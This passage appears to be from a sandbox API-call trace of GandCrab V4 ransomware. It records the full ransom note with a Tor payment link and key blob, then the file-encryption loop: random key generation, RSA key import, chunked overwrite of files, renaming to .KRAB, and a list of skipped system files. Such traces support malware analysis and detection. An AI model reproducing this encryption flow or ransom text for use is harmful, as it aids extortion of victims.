hTemplateFile=0x0) returned 0x448 [0060.322] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.322] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.323] CloseHandle (hObject=0x448) returned 1 [0060.323] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.324] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.324] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x20c)) [0060.324] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.324] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.324] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.324] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock") returned 91 [0060.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0060.343] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.344] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned 68 [0060.344] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0060.344] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd4a0 [0060.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.344] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.345] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.345] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.345] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.345] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock" [0060.345] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.345] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 96 [0060.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\d2ca4a08d2ca4dee3d.lock") returned 91 [0060.345] lstrlenW (lpString=".lock") returned 5 [0060.345] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.346] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.346] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.346] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.346] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.346] lstrcmpW (lpString1="Global.MPT", lpString2=".") returned 1 [0060.346] lstrcmpW (lpString1="Global.MPT", lpString2="..") returned 1 [0060.346] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="Global.MPT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" [0060.346] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.347] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.KRAB") returned 83 [0060.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0060.347] lstrlenW (lpString=".MPT") returned 4 [0060.347] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.347] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".MPT ") returned 5 [0060.347] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0060.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0060.347] lstrcmpiW (lpString1="Global.MPT", lpString2="desktop.ini") returned 1 [0060.347] lstrcmpiW (lpString1="Global.MPT", lpString2="autorun.inf") returned 1 [0060.347] lstrcmpiW (lpString1="Global.MPT", lpString2="ntuser.dat") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="iconcache.db") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="bootsect.bak") returned 1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="boot.ini") returned 1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="ntuser.dat.log") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="thumbs.db") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="KRAB-DECRYPT.html") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="KRAB-DECRYPT.txt") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="CRAB-DECRYPT.txt") returned 1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="ntldr") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="NTDETECT.COM") returned -1 [0060.348] lstrcmpiW (lpString1="Global.MPT", lpString2="Bootfont.bin") returned 1 [0060.348] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.348] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb880) returned 1 [0060.426] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.426] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.426] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.426] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0060.426] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0060.426] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.427] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb440) returned 1 [0060.432] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.432] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.432] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.432] CryptGenRandom (in: hProv=0xfbb440, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0060.432] CryptReleaseContext (hProv=0xfbb440, dwFlags=0x0) returned 1 [0060.432] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.433] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbdd0) returned 1 [0060.433] CryptImportKey (in: hProv=0xfbbdd0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd2e0) returned 1 [0060.433] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0060.433] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0060.434] GetLastError () returned 0x0 [0060.434] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0060.434] CryptReleaseContext (hProv=0xfbbdd0, dwFlags=0x0) returned 1 [0060.434] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbe58) returned 1 [0060.434] CryptImportKey (in: hProv=0xfbbe58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd960) returned 1 [0060.434] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0060.435] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0060.435] GetLastError () returned 0x0 [0060.435] CryptDestroyKey (hKey=0xfbd960) returned 1 [0060.435] CryptReleaseContext (hProv=0xfbbe58, dwFlags=0x0) returned 1 [0060.435] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0060.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0060.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0060.442] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0060.563] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.563] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0060.565] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x36e00, lpOverlapped=0x0) returned 1 [0060.593] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfffc9200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.593] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x36e00, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x36e00, lpOverlapped=0x0) returned 1 [0060.594] WriteFile (in: hFile=0x450, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0060.594] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.598] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.602] CloseHandle (hObject=0x450) returned 1 [0060.675] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.676] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt.krab")) returned 1 [0060.735] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.736] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.736] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.736] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt" [0060.736] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.736] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt.KRAB") returned 89 [0060.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt") returned 84 [0060.736] lstrlenW (lpString=".txt") returned 4 [0060.736] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.736] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt") returned 84 [0060.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\KRAB-DECRYPT.txt") returned 84 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.737] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.737] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.737] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0060.738] FindClose (in: hFindFile=0xfbd4a0 | out: hFindFile=0xfbd4a0) returned 1 [0060.738] CloseHandle (hObject=0x448) returned 1 [0060.738] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.738] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.738] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt" [0060.738] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.738] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt.KRAB") returned 83 [0060.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt") returned 78 [0060.738] lstrlenW (lpString=".txt") returned 4 [0060.739] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.739] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt") returned 78 [0060.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\KRAB-DECRYPT.txt") returned 78 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.740] lstrcmpiW 